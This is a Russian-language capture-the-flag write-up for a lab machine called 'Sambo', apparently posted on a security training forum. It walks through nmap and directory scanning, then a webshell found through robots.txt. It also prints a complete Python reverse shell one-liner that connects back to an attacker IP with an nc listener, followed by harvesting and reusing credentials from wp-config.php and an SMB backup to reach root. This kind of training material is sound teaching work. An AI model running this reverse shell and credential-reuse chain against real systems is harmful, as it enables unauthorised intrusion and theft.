Writeup Самбо

r0dd9

Green Team
14.08.2019
36
31
Специализация
  1. Пентест
Прямая ссылка на задание

1. nmap samba
2. curl robot.txt
3. reverse shell
4. Admin Backup
5. root credentials


🔐 Цель

Сервер 192.168.2.208

🔍 Разведка цели

Открытые порты.

Bash:
┌──(kali㉿kali)-[~]
└─$ nmap -sS 192.168.2.208                              
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-30 13:11 +0000
Nmap scan report for 192.168.2.208
Host is up (0.14s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds

Banner grabbing.

Bash:
┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC -O -T3 -p 22,80,139,445 192.168.2.208
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-30 13:14 +0000
Nmap scan report for 192.168.2.208
Host is up (0.13s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
|   256 26:71:14:05:c3:3e:14:c5:e9:c1:b0:fb:4b:8a:f7:ac (ECDSA)
|_  256 24:44:8e:48:43:98:02:6b:f1:18:fe:ba:83:6b:88:12 (ED25519)
80/tcp  open  http        Apache httpd 2.4.62 ((Unix))
|_http-server-header: Apache/2.4.62 (Unix)
|_http-title: \xD0\xA1\xD0\xB0\xD0\xBC\xD0\xB1\xD0\xBE
| http-robots.txt: 1 disallowed entry
|_/phpbash.php
|_http-generator: WordPress 6.7.1
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops

Host script results:
| smb2-time:
|   date: 2026-06-30T13:14:21
|_  start_date: N/A
|_nbstat: NetBIOS name: SAMBO, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.17 seconds

Fuzzing директорий.

Bash:
┌──(kali㉿kali)-[~]
└─$ dirsearch -u 192.168.2.208      
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/_192.168.2.208/_26-06-30_13-16-48.txt

Target: http://192.168.2.208/

[13:16:48] Starting:                                                                                                                                                                                              
[13:17:02] 403 -  276B  - /.ht_wsr.txt                                     
[13:17:02] 403 -  276B  - /.htaccess.bak1                                  
[13:17:02] 403 -  276B  - /.htaccess.orig                                  
[13:17:02] 403 -  276B  - /.htaccess.sample
[13:17:02] 403 -  276B  - /.htaccess_orig
[13:17:02] 403 -  276B  - /.htaccessOLD2                                   
[13:17:02] 403 -  276B  - /.htaccessBAK
[13:17:02] 403 -  276B  - /.htaccessOLD                                    
[13:17:02] 403 -  276B  - /.htaccess_sc
[13:17:02] 403 -  276B  - /.htaccess.save
[13:17:02] 403 -  276B  - /.htaccess_extra                                 
[13:17:02] 403 -  276B  - /.htm
[13:17:02] 403 -  276B  - /.html
[13:17:02] 403 -  276B  - /.htpasswd_test                                  
[13:17:02] 403 -  276B  - /.htpasswds                                      
[13:17:02] 403 -  276B  - /.httr-oauth                                     
[13:17:28] 200 -  820B  - /cgi-bin/printenv                                
[13:17:28] 200 -    1KB - /cgi-bin/test-cgi
[13:17:33] 301 -  311B  - /data  ->  http://192.168.2.208/data/            
[13:17:33] 403 -  276B  - /data/adminer.php                                
[13:17:33] 403 -  276B  - /data/
[13:17:33] 403 -  276B  - /data/backups/
[13:17:33] 403 -  276B  - /data/cache/
[13:17:33] 403 -  276B  - /data/autosuggest
[13:17:33] 403 -  276B  - /data/debug/
[13:17:33] 403 -  276B  - /data/DoctrineORMModule/Proxy/
[13:17:33] 403 -  276B  - /data/DoctrineORMModule/cache/                   
[13:17:33] 403 -  276B  - /data/logs/
[13:17:33] 403 -  276B  - /data/sessions/
[13:17:33] 403 -  276B  - /data/tmp/
[13:17:33] 403 -  276B  - /data/files/
[13:17:42] 301 -    0B  - /index.php  ->  http://192.168.2.208/            
[13:17:42] 404 -   53KB - /index.php/login/                                
[13:17:45] 200 -   19KB - /license.txt                                     
[13:17:57] 200 -    7KB - /readme.html                                     
[13:17:58] 200 -   37B  - /robots.txt                                      
[13:18:00] 403 -  276B  - /server-status/                                  
[13:18:00] 403 -  276B  - /server-status
[13:18:12] 301 -  315B  - /wp-admin  ->  http://192.168.2.208/wp-admin/    
[13:18:12] 301 -  317B  - /wp-content  ->  http://192.168.2.208/wp-content/
[13:18:12] 200 -    0B  - /wp-content/                                     
[13:18:12] 200 -   69B  - /wp-content/plugins/akismet/akismet.php          
[13:18:12] 500 -    0B  - /wp-content/plugins/hello.php                    
[13:18:12] 200 -  359B  - /wp-content/uploads/                             
[13:18:12] 301 -  318B  - /wp-includes  ->  http://192.168.2.208/wp-includes/
[13:18:13] 200 -    0B  - /wp-includes/rss-functions.php                   
[13:18:13] 200 -    0B  - /wp-cron.php                                     
[13:18:13] 409 -    3KB - /wp-admin/setup-config.php                       
[13:18:13] 200 -    4KB - /wp-login.php                                    
[13:18:13] 200 -   17KB - /wp-includes/                                    
[13:18:13] 302 -    0B  - /wp-signup.php  ->  http://192.168.2.238/wp-login.php?action=register
[13:18:14] 405 -   42B  - /xmlrpc.php                                      
[13:18:15] 200 -    0B  - /wp-config.php                                    
[13:18:15] 400 -    1B  - /wp-admin/admin-ajax.php
[13:18:15] 302 -    0B  - /wp-admin/  ->  http://192.168.2.238/wp-login.php?redirect_to=http%3A%2F%2F192
[13:18:15] 200 -    1KB - /wp-admin/install.php

Task Completed

В robots.txt webshell phpbash.php

Bash:
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.2.208/robots.txt
User-Agent: *
Disallow: /phpbash.php

🎯 Выбираем вектор атаки

Откроем в браузере

webshell phpbash.php - это интерактивная веб-консоль, которая предоставляет полноценную командную оболочку прямо в браузере.


Bash:
apache@sambo
:/var/www/localhost/htdocs# id

uid=103(apache) gid=104(apache) groups=82(www-data),104(apache),104(apache)
apache@sambo
:/var/www/localhost/htdocs# which python

/usr/bin/python

есть python сделаем reverse shell

Bash:
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.168.116.116",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

🧩 Этап 1: reverse shell

Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.116.116] from (UNKNOWN) [192.168.2.208] 54678
/bin/sh: can't access tty; job control turned off

/var/www/localhost/htdocs $ cat wp-config.php


/** Database username */
define( 'DB_USER', 'admin' );

/** Database password */
define( 'DB_PASSWORD', 'R-e4|D0:50Tl' );

🔑 Этап 2: Admin Backups

Проверим подключение к SMB-серверу с использованием найденных учётных данных для перечисления доступных шар.

Bash:
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.2.208 -u admin -p 'R-e4|D0:50Tl' --shares
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SSH protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing WINRM protocol database
[*] Initializing MSSQL protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         192.168.2.208   445    SAMBO            [*] Windows 6.1 Build 0 (name:SAMBO) (domain:localdomain) (signing:False) (SMBv1:False)
SMB         192.168.2.208   445    SAMBO            [+] localdomain\admin:R-e4|D0:50Tl
SMB         192.168.2.208   445    SAMBO            [+] Enumerated shares
SMB         192.168.2.208   445    SAMBO            Share           Permissions     Remark
SMB         192.168.2.208   445    SAMBO            -----           -----------     ------
SMB         192.168.2.208   445    SAMBO            storage         READ            Admin Backups
SMB         192.168.2.208   445    SAMBO            IPC$                            IPC Service (Samba 4.20.6)

Скачаем backup.

Bash:
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.2.208/storage -U admin%'R-e4|D0:50Tl'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 03:54:11 2025
  ..                                  D        0  Mon Jan 20 03:54:11 2025
  wordpress.bak                       N 29877616  Mon Jan 20 03:54:11 2025

                1208288 blocks of size 1024. 242148 blocks available
               
smb: \> get wordpress.bak
getting file \wordpress.bak of size 29877616 as wordpress.bak (2096.5 KiloBytes/sec) (average 2096.5 KiloBytes/sec)
📁 Этап 3: root credentials

Это архив, в нем config wordpress.

Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ file wordpress.bak                                      
wordpress.bak: Zip archive data, at least v2.0 to extract, compression method=deflate


Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ unzip -l wordpress.bak                                  
Archive:  wordpress.bak

Распакуем и найдем еще один пароль.

Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ cat wp-config.php


/** Database username */
define( 'DB_USER', 'admin' );

/** Database password */
define( 'DB_PASSWORD', '29:Lb4Yb+SAs' );

🚀 Этап 4: LPE - flag

Пароль подошел для root.

screen — 2026-06-30 в 23.55.36.webp

💥 CTF решен!

✅ Инструменты: nmap, curl, crackmapexec, smbclient, python, nc
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🧭 Навигатор · ИБ 2026
Не знаешь, какой трек твой?
5 направлений ИБ, реальные зарплаты и точка входа для каждого — в одном треде.
JuniorSenior+
100K → 600K+ ₽ /мес
Открыть навигатор →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab